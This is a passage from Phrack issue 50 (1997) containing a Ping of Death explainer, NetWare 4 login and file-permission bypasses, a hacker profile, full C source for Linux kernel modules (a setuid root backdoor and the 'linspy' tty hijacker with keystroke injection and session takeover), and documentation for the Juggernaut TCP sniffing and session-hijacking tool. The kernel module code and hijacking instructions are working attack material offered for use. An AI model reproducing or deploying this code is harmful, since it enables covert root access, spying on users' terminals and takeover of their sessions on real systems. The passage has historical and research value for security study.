devastating. Some vulnerable machines will hang for a relatively short period
time then recover, some hang indefinitely, others dump core (writing a huge
file of current memory contents, often followed by a crash), some lose
all network connectivity, many rebooted or simply gave up the ghost.
[ Relevant IP Basics ]
Contrary to popular belief, the problem has nothing to do with the
`ping` program. The problem lies in the IP module. More specifically,
the problem lies the in the fragmentation/reassembly portion of the IP module.
This is portion of the IP protocol where the packets are broken into smaller
pieces for transit, and also where they are reassembled for processing. An IP
packet has a maximum size constrained by a 16-bit header field (a header is a
portion of a packet that contains information about the packet, including
where it came from and where it is going). The maximum size of an IP packet
is 65,535 (2^16-1) bytes. The IP header itself is usually 20 bytes so this
leaves us with 65,515 bytes to stuff our data into. The underlying link layer
(the link layer is the network logically under IP, often ethernet) can seldom
handle packets this large (ethernet for example, can only handle packets up to
1500 bytes in size). So, in order for the link layer to be able to digest a
large packet, the IP module must fragment (break down into smaller pieces)
each packet it sends to down to the link layer for transmission on the network.
Each individual fragment is a portion of the original packet, with its own
header containing information on exactly how the receiving end should put it
back together. This putting the individual packets back together is called
reassembly. When the receiving end has all of the fragments, it reassembles
them into the original IP packet, and then processes it.
[ The attack ]
The large packet attack is quite simple in concept. A malicious user
constructs a large packet and sends it off. If the destination host is
vulnerable, something bad happens (see above). The problem lies in the
reassembly of these large packets. Recall that we have 65,515 bytes of space
in which to stuff data into. As it happens, a few misbehaved applications
(and some specially crafted evil ones) will allow one to place slightly more
data into the payload (say 65,520 bytes). This, along with a 20 byte IP
header, violates the maximum packet size of 65,535 bytes. The IP module will
then simply break this oversized packet into fragments and eschew them to
their intended destination (target). The receiving host will queue all of the
fragments until the last one arrives, then begin the process of reassembly.
The problem will surface when the IP module finds that the packet is in
fact larger than the maximum allowable size as an internal buffer is
overflowed. This is where something bad happens (see above).
[ Vulnerability Testing and Patching ]
Testing to see if a network device is vulnerable is quite easy.
Windows NT and Windows 95 will allow construction of these oversized
packets without complaining. Simply type: `ping -l 65508 targethost`. In
this case, we are delivering an oversized IP packet inside of a ping packet,
which has a header size of 8 bytes. If you add up the totals, 20 bytes of IP
header + 8 bytes of ping header + 65,508 bytes of data, you get a 65,536 byte
IP packet. This is enough to cause affected systems to have problems.
Defense is preventative. The only way to really be safe from this
attack is to either ensure your system is patched, or unplug its network tap.
There are patches available for just about every vulnerable system. For
a copious list of vulnerable systems and patches, check out a 'Ping of Death'
webpage near you.
daemon9
Editor, Phrack Magazine
(daemon9@netcom.com)
---------------------------------------------------------------------------
To: route@onyx.infonexus.com
From: xxxx xxxxxxxxxxx
Subject: Re: ?
Status: RO
Actually, hang on. I've looked your story up and down looking for ways to
make it more interesting and I can't. I think it's actually just too
technical for us and lacks a newsworthiness that was evident in the SYN
article. I mean, you never tell us why we should care about this, and
frankly, I don't know why we should. So, you're welcome to take another
pass at it, otherwise, I'll give you the kill fee of $100.
xxxx
[ Too techinical? Any less techincal and I would have to make everything
rhyme so people wouldn't fall asleep. ]
---------------------------------------------------------------------------
----<>----
Netware Insecurities
Tonto
[the rant]
I realize that to most security professionals and
system administrators who will see this magazine,
the term "NetWare security" is a punchline. That
unfortunately does not change the fact that many
people in the field, myself included, must deal
with it daily. Really, honestly, I do agree with
you. Please don't write me to tell me about how
futile it is. I already know.
Since its release, not much security news has really
surfaced surrounding Novell NetWare 4. A lot of the
security flaws that were present in 3.1x were 'fixed'
in 4.x since Novell pretty much redesigned the way
the user/resource database worked, was referenced,
and stored. Some flaws remained, although fixes for
them are well-known, and easily applied. However,
NetWare 4 came with its own batch of new security
flaws, and Novell has done a poor job of addressing
them, hoping that consumer-end ignorance and the
client/server software's proprietary design will hide
these holes. You'd figure they would know better by
now.
The ability to use a packet sniffer to snag RCONSOLE
passwords still exists; NetWare 4 institutes client-end
authentication to implement its auto-reconnect feature;
the list goes on. Below are just a couple of examples
of such bugs and how to deal with them. As new Novell
products bring many existing LANs out onto the Internet,
I think you will see more of this sort of thing coming
to the surface. I hope that when it does, Novell decides
to take a more responsible role in security support for
its products. I'd hate for such a widely used product
to become the next HP/UX.
[the exploits]
[BUG #1]
This bug is known to affect NetWare 4.10. It's probably present in 4.01
and other versions that support Directory Services, but I haven't
verified this. I'm only a CNA, so I tried to verify this bug by talking
to a group of CNEs and nobody had heard of this, although there are
apparently other bugs in previous versions of LOGIN.EXE.
The bug is a combination of some weak code in LOGIN-4.12
(SYS:\LOGIN\LOGIN.EXE) and a default User object in NDS - the user template
USER_TEMPLATE. LOGIN allows input fields to be passed directly, instead
of filtered, if they are passed to LOGIN correctly -- by specifying an
object's context explicitly (as opposed to implicitly by using CX) and
putting the User object's name in quotes.
F:\PUBLIC>LOGIN SVR1/"USER_TEMPLATE"
For Server object SVR1 in an appropriate context, this would probably work
and give a generic level of user access, perhaps to other volumes,
programs, etc. That will vary depending on the setup of the server.
The fix is simple. Load SYS:\PUBLIC\NWADMIN.EXE and disable the user
template's login. But from now on, you will have to manually enable
login for any new User objects created in your tree.
[BUG #2]
This isn't a bug as much as a failed attempt to add security to a DOS file
system. But since Novell touts (and teaches) it as a file system security
tool, it is worth addressing.
NetWare comes with a tool called FLAG, which is supposed to be the NetWare
equivalent of UNIX's chmod(), in that it controls file attributes for files
on local and NetWare file systems. The problem lies in that Novell
thought it would be neat to incorporate its tool into the world of DOS file
attributes as well. So they made FLAG alter DOS file attributes
automatically to correspond with the new attributes installed by FLAG.
This would've been cool, except that DOS's ATTRIB.EXE can also be used to
change the DOS-supported file attributes set by FLAG. (Archive, Read-only,
Hidden, and System, respectively) And since ATTRIB doesn't reference NDS
in any way, the problem is obvious; A file that was marked Read-only by
its owner, using FLAG, could be compromised by a user other than its owner,
with ATTRIB, and then altered or deleted.
There isn't an easy fix for something that is this broken, so it is
simply recommended that you use IRFs (carefully) to designate file rights
on your server.
[ 01-07-97 - Tont0 ]
----<>----
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
4 of 16
-:[ Phrack Pro-Phile ]:-
Aleph One
~~~~~~~~~
Personal
~~~~~~~~
Handle: Aleph One
Call him: Aleph
Past handles: None
Handle origin: Transfinite Math
("Infinity and the Mind" by Rudy Rucker)
Date of Birth: 1974
Height: 6 feet
Weight: No idea.
Eye color: Olive
Hair Color: Dark Brown
Computers: Two
Admin of: Underground.Org, and BugTraq
Sites Frequented: None. I got better things to do with my time.
URLs: http://www.disinfo.com/
Favorite Things
~~~~~~~~~~~~~~~
Women: Intelligent, sexy with beautiful eyes and class.
Cars: None. They are a pain. Ride a motorcycle.
Foods: Exotic. Sushi (Anago), Arab, Chinese, Vietnamese,
Thai, Indian, Ethiopian. Seafood. Meat. Anything on
a grill. Anything flambé. Wine: Chianti.
Music: Techno: Leftfield, Orbital, Underworld, Electric
Skychurch, Prodigy, Juno Reacto,
Chemical Brothers, Ambient, GOA Trace.
Rock: Tool, Marylin Mason, Beck, Garbage, NIN.
Classical: Bach, Baroque
Soundtracks: Natural Born Killers, The Piano, Braveheart,
RobRoy.
Books: "Godel, Escher, Bach" by Douglas R. Hofstadter
"Infinity and the Mind" by Rudy Rucker
"100 Years of Solitude" (in Spanish)
by Gabriel Garcia Marques
"Metamorphosis" by Kafka
Turn Ons: Intelligence. Class. Pierced belly buttons.
Tasteful tattoos. Long hair.
Turn Offs: Ignorance. Attitude. Bad tattoos.
Other passions, interests, loves:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Painting - Went to a painting/drawing class for 3 years. Did
everything from pencil, pastels, up to watercolors. I stopped going
when I started working with oils. I haven't painted in almost 7 years.
Too bad, I enjoyed it.
Math - For some reason I always liked math. I hated doing exercises,
but always liked the theory. Guess that's why my grades were not
better. I was intending to do a minor in math but I quit school
before that ever happened...
Reading - One of the things I value the most are my books. I really enjoy
reading. Sadly, lately, all I read are technical books. I need to
start reading other stuff again.
AI - When I started fooling around with computers I wanted to go into AI,
but the lack of material at my disposition at the time kept me from
delving into it too much.
Most memorable experiences:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Death - It marks your life for ever.
Burning Man '95 - One of the most intense experiences of my life.
Nothing can compare to the creation and expression of this community
that grows and dies in one of the most inhospitable, yet more
beautiful, places on earth.
Some people to mention:
~~~~~~~~~~~~~~~~~~~~~~~
Annaliza (for all the rides from work, all the adventures, always being
there, and the hot cocoa)
Luis (for all the good times, the bad times, and begin one fucking
crazy Spanish cosaco)
Mr. Upsetter, Buckaroo Banzai, Dan, Rod & Rika, Sir Dystic, Freqout,
White Knight & Loren (for being good friends)
Intrepid Traveller (for giving me the number to Lunatic Labs)
Noid, Pappy, Phax, Elvis Smurf, Ming of Mongo, TRW, Clockwork, and the
rest of the old LA 2600 crew (for being themselves)
Veggie (for being larger than life)
Mycroft (who would have thought?)
r00t (for being elite)
A few things you would like to say:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Knowledge come from within.
The New Security Threat: Disinformation
Statistics show that network break-ins are on the rise. Entities
connecting to the Net expect to be broken into. They know it's only
a matter of time before some random hacker targets their machines using
the latest warez to bypass their firewall and break into their machine.
They have seen it happen over and over. The CIA, DOJ, NASA, MGM/UA, etc.
The modus operandi is always the same: Deface the web page, or trash the
machines. For this occurrence they have prepared. Backups are in place, and
ready to be used. Hacked web pages hardly stay up more than half and hour
before they are taken down. What ever message the hackers wanted to deliver
was probably only seen by a handful of people. There no longer is any
incentive to hack a web site that no one will see.
So what is next? Disinformation.
The Internet as a medium facilitates the free flow of information. Single
individuals can reach large, as yet before unreachable audiences. Information
that before would have been relegated to some obscure corner, now travels at
the speed of light and is disseminated all over the world. Everyday the Net
is becoming a more important source of leads and information for the standard
news media. It usually only takes a few hours before some information such
as a new product, or some new bug, published on the Net appears on TV or
some newspaper's web site. And as more companies publish information online
our dependence on the Net as a source of information will only increase.
But the medium does not attempt to validate or even authenticate this
information in most cases. A anonymous tip on some newsgroup or web site
can cause a company a lot of headaches. Even the worst are half-truths.
Just look at the damage control that corporations such as Microsoft and Intel
had to do in the past. But this is only the beginning.
What if that motivated hacker decides that instead of replacing the
company's web site with some obscene language and graphics that will be
taken down almost immediately we will add a small officially worded press
release to the web site. How long until someone notices? How long until
they realize it's a fake. Maybe we should also email the press release to
some media contacts. What are the chances that it will be catch before it
makes it into the news? Or that it will catch before it's discussed on some
newsgroup with a large audience?
The amount of damage control a well placed piece of information coming
from a seemingly reputable source is incredible. This, I believe, is where
future attacks lay.
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
5 of 16
============================================
Abuse of the Linux Kernel for Fun and Profit
halflife@infonexus.com
[guild corporation]
============================================
Introduction
------------
Loadable modules are a very useful feature in linux, as they let
you load device drivers on a as-needed basis. However, there is
a bad side: they make kernel hacking almost TOO easy. What happens
when you can no longer trust your own kernel...? This article describes
a simple way kernel modules can be easily abused.
System calls
------------
System calls. These are the lowest level of functions available, and
are implemented within the kernel. In this article, we will discuss how
they can be abused to let us write a very simplistic tty hijacker/monitor.
All code was written and designed for linux machines, and will not compile
on anything else, since we are mucking with the kernel.
TTY Hijackers, such as tap and ttywatcher are common on Solaris,
SunOS, and other systems with STREAMS, but Linux thus far has not had
a useful tty hijacker (note: I don't consider pty based code such as
telnetsnoop to be a hijacker, nor very useful since you must make
preparations ahead of time to monitor users).
Since linux currently lacks STREAMS (LinSTREAMS appears to be dead),
we must come up with a alternative way to monitor the stream. Stuffing
keystrokes is not a problem, since we can use the TIOCSTI ioctl to stuff
keystrokes into the input stream. The solution, of course, is to redirect
the write(2) system call to our own code which logs the contents of the
write if it is directed at our tty; we can then call the real write(2)
system call.
Clearly, a device driver is going to be the best way to do things. We
can read from the device to get the data that has been logged, and add
a ioctl or two in order to tell our code exactly what tty we want to log.
Redirection of system calls
---------------------------
System calls are pretty easy to redirect to our own code. It works in
principle like DOS terminate and stay resident code. We save the old
address in a variable, then set a new one pointing to our code. In our
code, we do our thing, and then call the original code when finished.
A very simple example of this is contained in hacked_setuid.c, which
is a simple loadable module that you can insmod, and once it is inserted
into the kernel, a setuid(4755) will set your uid/euid/gid/egid to 0.
(See the appended file for all the code.) The addresses for the
syscalls are contained in the sys_call_table array. It is relatively easy
to redirect syscalls to point to our code. Once we have done this, many
things are possible...
Linspy notes
------------
This module is VERY easy to spot, all you have to do is cat /proc/modules
and it shows up as plain as day. Things can be done to fix this, but I
have no intention on doing them.
To use linspy, you need to create an ltap device, the major should
be 40 and the minor should be 0. After you do that, run make and then
insmod the linspy device. Once it is inserted, you can run ltread [tty]
and if all goes well, you should see stuff that is output to the user's
screen. If all does not go well ... well, I shall leave that to your
nightmares.
The Code [use the included extract.c utility to unarchive the code]
---------------------------------------------------------------------
<++> linspy/Makefile
CONFIG_KERNELD=-DCONFIG_KERNELD
CFLAGS = -m486 -O6 -pipe -fomit-frame-pointer -Wall $(CONFIG_KERNELD)
CC=gcc
# this is the name of the device you have (or will) made with mknod
DN = '-DDEVICE_NAME="/dev/ltap"'
# 1.2.x need this to compile, comment out on 1.3+ kernels
V = #-DNEED_VERSION
MODCFLAGS := $(V) $(CFLAGS) -DMODULE -D__KERNEL__ -DLINUX
all: linspy ltread setuid
linspy: linspy.c /usr/include/linux/version.h
$(CC) $(MODCFLAGS) -c linspy.c
ltread:
$(CC) $(DN) -o ltread ltread.c
clean:
rm *.o ltread
setuid: hacked_setuid.c /usr/include/linux/version.h
$(CC) $(MODCFLAGS) -c hacked_setuid.c
<--> end Makefile
<++> linspy/hacked_setuid.c
int errno;
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef NEED_VERSION
static char kernel_version[] = UTS_RELEASE;
#endif
static inline _syscall1(int, setuid, uid_t, uid);
extern void *sys_call_table[];
void *original_setuid;
extern int hacked_setuid(uid_t uid)
{
int i;
if(uid == 4755)
{
current->uid = current->euid = current->gid = current->egid = 0;
return 0;
}
sys_call_table[SYS_setuid] = original_setuid;
i = setuid(uid);
sys_call_table[SYS_setuid] = hacked_setuid;
if(i == -1) return -errno;
else return i;
}
int init_module(void)
{
original_setuid = sys_call_table[SYS_setuid];
sys_call_table[SYS_setuid] = hacked_setuid;
return 0;
}
void cleanup_module(void)
{
sys_call_table[SYS_setuid] = original_setuid;
}
<++> linspy/linspy.c
int errno;
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef MODULE
#include
#include
#endif
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* set the version information, if needed */
#ifdef NEED_VERSION
static char kernel_version[] = UTS_RELEASE;
#endif
#ifndef MIN
#define MIN(a,b) ((a) < (b) ? (a) : (b))
#endif
/* ring buffer info */
#define BUFFERSZ 2048
char buffer[BUFFERSZ];
int queue_head = 0;
int queue_tail = 0;
/* taken_over indicates if the victim can see any output */
int taken_over = 0;
static inline _syscall3(int, write, int, fd, char *, buf, size_t, count);
extern void *sys_call_table[];
/* device info for the linspy device, and the device we are watching */
static int linspy_major = 40;
int tty_minor = -1;
int tty_major = 4;
/* address of original write(2) syscall */
void *original_write;
void save_write(char *, size_t);
int out_queue(void)
{
int c;
if(queue_head == queue_tail) return -1;
c = buffer[queue_head];
queue_head++;
if(queue_head == BUFFERSZ) queue_head=0;
return c;
}
int in_queue(int ch)
{
if((queue_tail + 1) == queue_head) return 0;
buffer[queue_tail] = ch;
queue_tail++;
if(queue_tail == BUFFERSZ) queue_tail=0;
return 1;
}
/* check if it is the tty we are looking for */
int is_fd_tty(int fd)
{
struct file *f=NULL;
struct inode *inode=NULL;
int mymajor=0;
int myminor=0;
if(fd >= NR_OPEN || !(f=current->files->fd[fd]) || !(inode=f->f_inode))
return 0;
mymajor = major(inode->i_rdev);
myminor = minor(inode->i_rdev);
if(mymajor != tty_major) return 0;
if(myminor != tty_minor) return 0;
return 1;
}
/* this is the new write(2) replacement call */
extern int new_write(int fd, char *buf, size_t count)
{
int r;
if(is_fd_tty(fd))
{
if(count > 0)
save_write(buf, count);
if(taken_over) return count;
}
sys_call_table[SYS_write] = original_write;
r = write(fd, buf, count);
sys_call_table[SYS_write] = new_write;
if(r == -1) return -errno;
else return r;
}
/* save data from the write(2) call into the buffer */
void save_write(char *buf, size_t count)
{
int i;
for(i=0;i < count;i++)
in_queue(get_fs_byte(buf+i));
}
/* read from the ltap device - return data from queue */
static int linspy_read(struct inode *in, struct file *fi, char *buf, int count)
{
int i;
int c;
int cnt=0;
if(current->euid != 0) return 0;
for(i=0;i < count;i++)
{
c = out_queue();
if(c < 0) break;
cnt++;
put_fs_byte(c, buf+i);
}
return cnt;
}
/* open the ltap device */
static int linspy_open(struct inode *in, struct file *fi)
{
if(current->euid != 0) return -EIO;
MOD_INC_USE_COUNT;
return 0;
}
/* close the ltap device */
static void linspy_close(struct inode *in, struct file *fi)
{
taken_over=0;
tty_minor = -1;
MOD_DEC_USE_COUNT;
}
/* some ioctl operations */
static int
linspy_ioctl(struct inode *in, struct file *fi, unsigned int cmd, unsigned long args)
{
#define LS_SETMAJOR 0
#define LS_SETMINOR 1
#define LS_FLUSHBUF 2
#define LS_TOGGLE 3
if(current->euid != 0) return -EIO;
switch(cmd)
{
case LS_SETMAJOR:
tty_major = args;
queue_head = 0;
queue_tail = 0;
break;
case LS_SETMINOR:
tty_minor = args;
queue_head = 0;
queue_tail = 0;
break;
case LS_FLUSHBUF:
queue_head=0;
queue_tail=0;
break;
case LS_TOGGLE:
if(taken_over) taken_over=0;
else taken_over=1;
break;
default:
return 1;
}
return 0;
}
static struct file_operations linspy = {
NULL,
linspy_read,
NULL,
NULL,
NULL,
linspy_ioctl,
NULL,
linspy_open,
linspy_close,
NULL
};
/* init the loadable module */
int init_module(void)
{
original_write = sys_call_table[SYS_write];
sys_call_table[SYS_write] = new_write;
if(register_chrdev(linspy_major, "linspy", &linspy)) return -EIO;
return 0;
}
/* cleanup module before being removed */
void cleanup_module(void)
{
sys_call_table[SYS_write] = original_write;
unregister_chrdev(linspy_major, "linspy");
}
<--> end linspy.c
<++> linspy/ltread.c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct termios save_termios;
int ttysavefd = -1;
int fd;
#ifndef DEVICE_NAME
#define DEVICE_NAME "/dev/ltap"
#endif
#define LS_SETMAJOR 0
#define LS_SETMINOR 1
#define LS_FLUSHBUF 2
#define LS_TOGGLE 3
void stuff_keystroke(int fd, char key)
{
ioctl(fd, TIOCSTI, &key);
}
int tty_cbreak(int fd)
{
struct termios buff;
if(tcgetattr(fd, &save_termios) < 0)
return -1;
buff = save_termios;
buff.c_lflag &= ~(ECHO | ICANON);
buff.c_cc[VMIN] = 0;
buff.c_cc[VTIME] = 0;
if(tcsetattr(fd, TCSAFLUSH, &buff) < 0)
return -1;
ttysavefd = fd;
return 0;
}
char *get_device(char *basedevice)
{
static char devname[1024];
int fd;
if(strlen(basedevice) > 128) return NULL;
if(basedevice[0] == '/')
strcpy(devname, basedevice);
else
sprintf(devname, "/dev/%s", basedevice);
fd = open(devname, O_RDONLY);
if(fd < 0) return NULL;
if(!isatty(fd)) return NULL;
close(fd);
return devname;
}
int do_ioctl(char *device)
{
struct stat mystat;
if(stat(device, &mystat) < 0) return -1;
fd = open(DEVICE_NAME, O_RDONLY);
if(fd < 0) return -1;
if(ioctl(fd, LS_SETMAJOR, major(mystat.st_rdev)) < 0) return -1;
if(ioctl(fd, LS_SETMINOR, minor(mystat.st_rdev)) < 0) return -1;
}
void sigint_handler(int s)
{
exit(s);
}
void cleanup_atexit(void)
{
puts(" ");
if(ttysavefd >= 0)
tcsetattr(ttysavefd, TCSAFLUSH, &save_termios);
}
main(int argc, char **argv)
{
int my_tty;
char *devname;
unsigned char ch;
int i;
if(argc != 2)
{
fprintf(stderr, "%s ttyname\n", argv[0]);
fprintf(stderr, "ttyname should NOT be your current tty!\n");
exit(0);
}
devname = get_device(argv[1]);
if(devname == NULL)
{
perror("get_device");
exit(0);
}
if(tty_cbreak(0) < 0)
{
perror("tty_cbreak");
exit(0);
}
atexit(cleanup_atexit);
signal(SIGINT, sigint_handler);
if(do_ioctl(devname) < 0)
{
perror("do_ioctl");
exit(0);
}
my_tty = open(devname, O_RDWR);
if(my_tty == -1) exit(0);
setvbuf(stdout, NULL, _IONBF, 0);
printf("[now monitoring session]\n");
while(1)
{
i = read(0, &ch, 1);
if(i > 0)
{
if(ch == 24)
{
ioctl(fd, LS_TOGGLE, 0);
printf("[Takeover mode toggled]\n");
}
else stuff_keystroke(my_tty, ch);
}
i = read(fd, &ch, 1);
if(i > 0)
putchar(ch);
}
}
<--> end ltread.c
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
6 of 16
J U G G E R N A U T
route|daemon9
a guild corporation production 1996/7
Please use the included extract.c utility to extract the files and then
read the Install file. Any problems/comments mail me route@infonexus.com.
A boot image is forthcoming that will allow a user to simply pop a disk
into most any networked PC and turn it into a Juggernaut workstation.
<++> Juggernaut/ClothLikeGauze/.help
Juggernaut 1.0 Help File
|--------
|Overview
|--------
Juggernaut is a robust network tool for the Linux OS. It contains several
modules offering a wide degree of functionality. Juggernaut has been tested
successfully on several different Linux machines on several different networks.
However, your mileage may vary depending on the network topologies of the
environment (ie: Smart hubbing will kill much of the packet sniffing
functionality...) and, to a lesser extent, the machine running Juggernaut.
If something doesn't work, use a network debugger and figure out why...
Juggernaut v1.0 was originally published in Phrack Magazine, issue 50; on
April 9, 1997.
Any serious problems/bugs or comments, please mail me:
route@infonexus.com
|---------------------
|Command Line Options
|---------------------
juggernaut -h
Quick help.
juggernaut -H
Dumps this help file.
juggernaut -v
By default, Juggernaut conveys error messages and other
diagnostic information to the user. Specifying this
option will cause Juggernaut to shut the hell up.
Not recommended unless you know what you are doing.
juggernaut -t xx [ juggernaut -t 5 ]
This option specifies the network read timeout (which
defaults to 10 seconds). This value reflects how long
Juggernaut will wait for network traffic before giving
up. In this case, it will wait 5 seconds.
juggernaut -s TOKEN [ juggernaut -s login ]
Dedicated sniffing mode. Juggernaut will drop to the
background and examine all TCP packets looking for
TOKEN. When TOKEN is located, it then isolates that
TCP circuit and captures the next 16 (the default
enticement factor) packets and logs them to a file. It
then resets and continues sifting through TCP traffic
looking for TOKEN.
juggernaut -s TOKEN -e xx [ juggernaut -s daemon9 -e 1000 ]
By specifying a larger enticement factor, you can
capture more packets from a session. This time, after
locating TOKEN, Juggernaut will capture 1000 packets
before reseting.
juggernaut
This starts the program in standard mode.
|-------------
|Menu Options
|-------------
This is normal mode of operation for Juggernaut. This is where the magic
happens, this is where the fun is. The program will examine all network
traffic and add suitable TCP connections to the connection database (which
is viewed with option 1). After at least one connection is in the database,
you can start mucking around with it (connection construction and destruction
are indicated by the appearance of the "+" or the "-" at the console). Note
that connections involving a local interface may not show up (unless the
localhost is dual-homed).
One possible shortcoming of the program is the fact that it stores very
little state information about connections in the database. Juggernaut
collects whatever information it needs (and doesn't have) on the fly. As
such, a quiet connection (no traffic) will elude hijacking and reseting. The
benefit of this is the fact that the program does not have to tie itself up
updating the shared memory segment with state every time a packet flies by.
?) Help
This file.
0) Program information
Dumps some stuff...
1) Connection database
Dumps the current connection list and percent to
capacity. Gives the option to wipe the database.
2) Spy on a connection
Allows a user to spy on any connection in the database,
with the option of logging the entire session to a
file.
3) Reset a connection
Allows the user to destroy any existing connection in
the database.
4) Automated connection reset daemon
Allows the user to setup an automated TCP RST daemon
that will listen for connection request attempts
from a specified source host (and optionally a
destination host) and then reset them before they
have a chance to complete. Requires a source IP
address and optionally a destination address.
This module prints a "*" to the console when a
connection request attempt is attempted and denied...
5) Simplex connection hijack
Allows the user to insert a command into a telnet
based TCP stream. A short ACK storm ensues until the
connection is subsequently reset.
6) Interactive connection hijack
Allows the user to take over a session from a
legitimate client. This desynchs the client from the
server as the user takes over. The resulting ACK
storm can be catastrophic and makes this interactive
session prone to failure. If both of the target hosts
are on an ethernet, expect a momunmental ACK storm.
7) Packet assembly module
The Prometheus module. Construction of TCP, UDP, ICMP,
and IP packets. The user has complete control over
most of the header fields and can opt for generating a
pseudo-random value. This module is far from done and
needs some serious work.
8) Souper sekret option number eight
Sshh.
9) Step down
Quitter.
|-------------
|Suggested Use
|-------------
scenario 1: The passive observer
menu options 1,2
The user is curious. She simply waits for
connections to arrive and then passively observes
them. Several invocations of Juggernaut may be
started, each spying on a different connection.
The user does not modify the flow of data or control.
scenario 2: The malicious observer
menu options 1,2,3
Same scenario as above, except the user alters the
flow of control and opts to destroy connections
at some point.
scenario 3: The active observer
menu options 1,2,3,5,(6)
Same as the previous situations, however the user
inserts data into the stream before destroying it.
scenario 4: The imp
menu options 1,2,3,4
The user is an impish devil and simply wants to
cause trouble by setting up multiple ACRST daemons.
scenario 5: The active observer with poisonous reverse
menu options 1,2,4,5
The user waits until a client establishes a connection
with a targeted server and then sets up the ACRST
daemon to destroy all further connection-request
attempts from the client. The user then spys on the
connection, waiting for an opportune time to inject
a hijack packet into the stream containing a
backdooring command/pipeline. The client will then
have her connection RST (after a brief ACK storm).
If the client attempts to re-establish the connection
with the server, she will be denied and likely think
it is a transient network error. The user can then
login into the server using the backdoor without fear
of the client logging back in.
Juggernaut is a Guild Corporation production, (c) 1996/7.
[corporate persuasion through Internet terrorism]
EOF
<-->
<++> Juggernaut/ClothLikeGauze/MANIFEST
File Manifest for Juggernaut 1.0
----------------------------
1996/7 daemon9[guild|phrack|r00t]
----------------------------
ClothLikeGauze/ Docs
.help Helpfile
copyright The legal tie that binds.
Install Installation instructions
MANIFEST This file
Makefile makefile
NumberOneCrush/ Sources
main.c main logic
mem.c shared memory/semaphore functions
menu.c menu functions
prometheus.c packet assembly workshop module
net.c socket/network functions
surplus.c dumping ground
Version history
---------------
version a1:
-----------
11.30.96: Decided to start. Juggernaut framework and queue stuff. Used
linked list queue originally to store connections.
12.01.96: Sniffing/spying/logging/RST stuff.
12.02-04: Not sure what I did here. I think I had a large turkey samich.
12.05.96: Redid memory abstract data type. Multithreaded. Implemented
shared memory segment and semaphore for access control.
Dumped ALL the dynamic memory allocation code.
12.06.96: Added packet assembly workshop hooks. Added curses. Removed
curses.
12.07.96: No coding today.
12.08.96: Non-interactive hijacking completed. I think we're ready for
beta now.
version b1:
-----------
12.09.96: IP_HDRINCL crap added.
12.15-18: I was in NYC for the r00tparty. No coding then.
12.19.96: Added automated RST stuff.
12.20-27: No coding.
12.28.96: Started work on interactive hijacking. Damned ACK storms.
12.30.96: Started packet assembly module for reals.
version b2:
-----------
01.25.97: Added network timeout logic.
01.26.97-
04.01.97: How can you possibly expect me to account for all that time?
I went to Germany with alhambra for a networking summit and
all over the US for other work, I was even in a Discovery
special on IW...
version 1.0:
------------
04.02.97: Here it is.
<-->
<++> Juggernaut/ClothLikeGauze/ToDo
Juggernaut ToDo list
--------------------
+ re-structure multitasking model to give the option of
using multi-processing OR multi-threading
+ Create boot image
+ Support for ongoing connections
+ Support for healthy choice hotdog sequencer
+ Add arp cache seeding routine; as connections are added, MAC
addresses will be added to the arp cache
+ Add support for different verbosity levels
+ Add support for IP and TCP options in packet assembly module
+ Better packet assembly support as a whole
+ Better code module plug-in support
+ much more robust packet sniffing module with support for
multiple protocols
+ um, interactive hijacking that doesn't kill the client
<-->
<++> Juggernaut/ClothLikeGauze/copyright
Juggernaut
Copyright (c) 1996/7 by daemon9/route [Guild] (route@infonexus.com)
Juggernaut source code, documentation, auxilliary programs, and
executables are Copyright 1996/7 daemon9[guild]. All rights reserved.
----------------------------------------------------------------------
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.
675 Mass Ave, Cambridge, MA 02139, USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Library General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
�
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".
Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
